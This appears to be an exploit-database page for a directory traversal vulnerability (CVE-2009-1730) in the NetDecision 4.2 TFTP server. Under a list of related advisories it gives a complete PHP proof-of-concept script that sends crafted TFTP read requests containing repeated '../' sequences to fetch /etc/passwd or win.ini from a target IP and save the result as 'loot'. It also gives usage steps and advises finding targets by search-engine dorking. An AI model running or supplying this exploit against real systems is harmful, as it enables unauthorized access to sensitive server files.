TFTP Server NetDecision 4.2 Directory Traversal

🗓️ 12 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 287 Views

TFTP Server NetDecision 4.2 has a directory traversal vulnerability to read sensitive files.

Reporter	Title	Published	Views	Family All 14
0day.today	NetDecision 4.2 TFTP Writable Directory Traversal Execution	10 Aug 201200:00	–	zdt
Circl	CVE-2009-1730	10 Aug 201200:00	–	circl
Check Point Advisories	Ipswitch TFTP Server Information disclosure (CVE-2009-1730)	30 Dec 201200:00	–	checkpoint_advisories
CVE	CVE-2009-1730	20 May 200918:00	–	cve
Cvelist	CVE-2009-1730	20 May 200918:00	–	cvelist
Exploit DB	NetDecision 4.2 - TFTP Writable Directory Traversal Execution (Metasploit)	10 Aug 201200:00	–	exploitdb
Metasploit	NetDecision 4.2 TFTP Directory Traversal	8 Aug 201214:26	–	metasploit
Metasploit	NetDecision 4.2 TFTP Writable Directory Traversal Execution	8 Aug 201214:28	–	metasploit
NVD	CVE-2009-1730	20 May 200918:30	–	nvd
OpenVAS	NetDecision TFTP Server Multiple Directory Traversal Vulnerabilities	29 May 200900:00	–	openvas

=============================================================================================================================================
    | # Title     : TFTP Server NetDecision 4.2 Directory Traversal vulnerability                                                               |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://netdecision.software.informer.com/                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Directory Traversal vulnerability in NetDecision 4.2's TFTP service to read sensitive files from targeted server.
       
       (Related : https://packetstorm.news/files/id/180940/ Linked CVE numbers:	CVE-2009-1730 ) .
    	
    [+] save code as poc.php.
    
    [+] Set taget : Line 75.
    
    [+] USage : php poc.php 
    
    [+] PayLoad :
    
    
    <?php
    function tftp_request($ip, $port, $os, $depth = 10) {
        $socket = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
        if (!$socket) {
            die(" فشل في إنشاء المقبس: " . socket_strerror(socket_last_error()) . "\n");
        }
    
        // اختيار الملف المناسب حسب نظام التشغيل
        $files = [
            'windows' => 'windows/win.ini',
            'linux'   => 'etc/passwd',
            'unix'    => 'etc/passwd',
            'macos'   => 'etc/passwd'
        ];
    
        if (!isset($files[$os])) {
            die(" نظام التشغيل غير مدعوم!\n");
        }
    
        $file_path = str_repeat("../", $depth) . $files[$os];
        $packet = "\x00\x01" . $file_path . "\x00octet\x00"; // طلب قراءة الملف (RRQ)
    
        // إرسال الطلب إلى الخادم
        socket_sendto($socket, $packet, strlen($packet), 0, $ip, $port);
        
        $file_data = "";
        while (true) {
            $buffer = "";
            $from = "";
            $port = 0;
            $bytes_received = socket_recvfrom($socket, $buffer, 65535, 0, $from, $port);
            
            if ($bytes_received === false) {
                echo " فشل في استقبال البيانات من $ip\n";
                break;
            }
    
            $opcode = unpack("n", substr($buffer, 0, 2))[1];
            $block = unpack("n", substr($buffer, 2, 2))[1];
            $data = substr($buffer, 4);
    
            if ($opcode !== 3) { // إذا لم يكن حزمة بيانات (DATA)
                echo " خطأ أثناء استرجاع الملف $file_path من $ip\n";
                break;
            }
    
            $file_data .= $data;
    
            // إرسال ACK للحزمة
            $ack_packet = "\x00\x04" . pack("n", $block);
            socket_sendto($socket, $ack_packet, strlen($ack_packet), 0, $ip, $port);
    
            // إذا كانت الحزمة الأخيرة أقل من 512 بايت، فمعناه نهاية الملف
            if (strlen($data) < 512) {
                break;
            }
        }
    
        socket_close($socket);
    
        if (!empty($file_data)) {
            echo " تم استرجاع الملف بنجاح!\n";
            $save_path = "loot_" . $os . "_" . basename($files[$os]);
            file_put_contents($save_path, $file_data);
            echo " الملف محفوظ باسم: $save_path\n";
        } else {
            echo " لم يتم العثور على أي بيانات.\n";
        }
    }
    
    // ==============================
    //  استخدام الدالة لاسترجاع ملفات مختلفة
    // ==============================
    
    $target_ip = "192.168.1.100";  // استبدل بعنوان IP للخادم المستهدف
    $tftp_port = 69; // المنفذ الافتراضي لـ TFTP
    $target_os = "linux"; // اختر: windows, linux, unix, macos
    $depth = 10; // عدد مستويات تجاوز المسار
    
    tftp_request($target_ip, $tftp_port, $target_os, $depth);
    ?>
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

12 Mar 2025 00:00Current

6.9Medium risk

Vulners AI Score6.9

CVSS 210

EPSS0.75274